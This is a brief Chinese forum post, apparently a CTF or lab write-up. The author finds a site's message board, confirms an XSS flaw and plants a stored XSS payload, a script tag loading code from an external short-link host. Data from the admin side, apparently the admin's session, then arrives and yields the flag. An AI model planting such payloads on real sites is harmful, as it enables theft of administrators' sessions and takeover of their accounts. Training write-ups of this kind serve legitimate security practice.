直接给出了后台地址,试了之前密码都没用,就换个思路吧
发现网站有留言板,嘿嘿,试试XSS
不管了,一顿乱插
提交刷新,发现有XSS漏洞的
拆入存储型XSS
<script src=http://t.cn/Rgdd5Y></script>
提交后,就去后台等一会,发现有数据来了
flag出现
打赏我,让我更有动力~
菜刀也是刀
用户组:Track 实习学员
积分:30 金币:122.80
主题: 16 帖子: 36
© 2016 - 2024 掌控者 All Rights Reserved.